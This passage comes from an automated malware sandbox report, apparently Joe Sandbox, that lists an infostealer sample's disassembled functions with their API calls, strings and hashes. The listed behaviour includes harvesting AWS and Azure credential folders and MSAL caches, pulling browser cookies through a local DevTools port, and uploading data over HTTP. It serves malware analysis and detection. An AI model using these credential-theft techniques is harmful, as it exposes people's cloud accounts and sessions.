                                            • lstrcat.KERNEL32(?,00421774), ref: 0246098B
                                            • lstrcat.KERNEL32(?,00421778), ref: 0246099A
                                            • lstrcat.KERNEL32(?,00000000), ref: 024609AD
                                            • lstrcat.KERNEL32(?,00421780), ref: 024609BC
                                            • lstrcat.KERNEL32(?,00421784), ref: 024609CB
                                            • lstrcat.KERNEL32(?,00000000), ref: 024609DE
                                            • lstrcat.KERNEL32(?,00421790), ref: 024609ED
                                            • lstrcat.KERNEL32(?,00421794), ref: 024609FC
                                            • strtok_s.MSVCRT ref: 02460A40
                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 02460A55
                                            • memset.MSVCRT ref: 02460AA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID:
                                            • API String ID: 3689735781-0
                                            • Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                            • Instruction ID: 3f840db8a8025c9a5d5aed53fcbcfe2b5a50a2dabea6e3b2d06f72193b421fa7
                                            • Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                            • Instruction Fuzzy Hash: 0DD13D71D01618ABCB04EBE1DD59EFE773AAF54701F50855EE102B6090EF35AA08CF62
                                            Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00405A63
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009D1FA0,00000000,?,009CBD08,00000000,?,00421B4C), ref: 00405EC1
                                            • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                            • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                            • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                            • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                            • memcpy.MSVCRT(?), ref: 00405F4E
                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                            • InternetCloseHandle.WININET(00000000), ref: 00406000
                                            • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                            • HttpOpenRequestA.WININET(00000000,009D1E40,?,009D1218,00000000,00000000,00400100,00000000), ref: 00405C48
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • InternetCloseHandle.WININET(00000000), ref: 00406017
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                            • String ID: "$"$------$------$------$S`A$S`A
                                            • API String ID: 1406981993-1449208648
                                            • Opcode ID: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                            • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                            • Opcode Fuzzy Hash: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                            • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                            Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00414FD7
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            • memset.MSVCRT ref: 00415063
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            • memset.MSVCRT ref: 004150EF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                              • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,009D1EC0,?,000003E8), ref: 00414C9A
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                              • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                              • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                              • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                            • memset.MSVCRT ref: 0041517B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                            • API String ID: 4017274736-974132213
                                            • Opcode ID: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                            • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                            • Opcode Fuzzy Hash: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                            • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
                                            Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                            • HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
                                            • lstrcatA.KERNEL32(?,00000000,009C9560,0042156C,009C9560,00421568,00000000), ref: 0040D308
                                            • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                            • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                            • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                            • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                            • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                            • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                            • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            • lstrlenA.KERNEL32(?), ref: 0040D42A
                                            • lstrlenA.KERNEL32(?), ref: 0040D439
                                            • memset.MSVCRT ref: 0040D488
                                              • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 2775534915-0
                                            • Opcode ID: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                            • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                            • Opcode Fuzzy Hash: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                            • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                            Function 0245D257 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245D2EA
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0245D42E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0245D435
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D56F
                                            • lstrcat.KERNEL32(?,00421570), ref: 0245D57E
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D591
                                            • lstrcat.KERNEL32(?,00421574), ref: 0245D5A0
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D5B3
                                            • lstrcat.KERNEL32(?,00421578), ref: 0245D5C2
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D5D5
                                            • lstrcat.KERNEL32(?,0042157C), ref: 0245D5E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D5F7
                                            • lstrcat.KERNEL32(?,00421580), ref: 0245D606
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D619
                                            • lstrcat.KERNEL32(?,00421584), ref: 0245D628
                                            • lstrcat.KERNEL32(?,00000000), ref: 0245D63B
                                            • lstrcat.KERNEL32(?,00421588), ref: 0245D64A
                                              • Part of subcall function 0246AD97: lstrlen.KERNEL32(024551BC,?,?,024551BC,00420DDF), ref: 0246ADA2
                                              • Part of subcall function 0246AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0246ADFC
                                            • lstrlen.KERNEL32(?), ref: 0245D691
                                            • lstrlen.KERNEL32(?), ref: 0245D6A0
                                            • memset.MSVCRT ref: 0245D6EF
                                              • Part of subcall function 0246AFE7: StrCmpCA.SHLWAPI(00000000,00421568,0245D509,00421568,00000000), ref: 0246B006
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245D71B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 1973479514-0
                                            • Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                            • Instruction ID: e29e95b9379b14abb9e22ba79196e72443c02612f9917f30d5475e9cddc32af4
                                            • Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                            • Instruction Fuzzy Hash: 4EE11071D00628ABCB08EBA1DD59DFE773AAF14301F50455EF546B60A0EF35AA48CF62
                                            Function 00409BE0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 141stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                            • memset.MSVCRT ref: 00409C33
                                            • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                            • memset.MSVCRT ref: 00409C9A
                                            • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                            • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                            • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                            • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                            • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                            • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                            • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                            • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • memset.MSVCRT ref: 00409D7E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                            • API String ID: 689835475-3542011879
                                            • Opcode ID: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                            • Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
                                            • Opcode Fuzzy Hash: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                            • Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                            Function 02455C17 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02455CAF
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 02455CCA
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02455E4A
                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 02456128
                                            • lstrlen.KERNEL32(00000000), ref: 02456139
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0245614A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02456151
                                            • lstrlen.KERNEL32(00000000), ref: 02456166
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 0245617D
                                            • lstrlen.KERNEL32(00000000), ref: 0245618F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 024561A8
                                            • memcpy.MSVCRT(?), ref: 024561B5
                                            • lstrlen.KERNEL32(00000000,?,?), ref: 024561D2
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 024561E6
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02456203
                                            • InternetCloseHandle.WININET(00000000), ref: 02456267
                                            • InternetCloseHandle.WININET(00000000), ref: 02456274
                                            • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 02455EAF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • InternetCloseHandle.WININET(00000000), ref: 0245627E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                            • String ID:
                                            • API String ID: 1703137719-0
                                            • Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                            • Instruction ID: 5760c5bb9318cd5c38060eb95dfdec9936f3067f20ba7c315ce143fcf0bdf280
                                            • Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                            • Instruction Fuzzy Hash: 8C12BA72950638AACB19EBA1DC98EFEB37ABF14701F50459EE14672090EF706E48CF51
                                            Function 0040CA90 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009D02E8,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                            • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                            • StrStrA.SHLWAPI(?,009D00A8,00420B56), ref: 0040CBF7
                                            • StrStrA.SHLWAPI(00000000,009D00D8), ref: 0040CC1E
                                            • StrStrA.SHLWAPI(?,009D0E08,00000000,?,00421550,00000000,?,00000000,00000000,?,009C9430,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                            • StrStrA.SHLWAPI(00000000,009D0DE8), ref: 0040CDB9
                                              • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                              • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009C94A0), ref: 0040C971
                                              • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                              • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                            • StrStrA.SHLWAPI(?,009D0DE8,00000000,?,00421554,00000000,?,00000000,009C94A0), ref: 0040CE5A
                                            • StrStrA.SHLWAPI(00000000,009C96A0), ref: 0040CE71
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                            • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                            • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 1564132460-3916222277
                                            • Opcode ID: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                            • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                            • Opcode Fuzzy Hash: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                            • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                            Function 0245CCF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
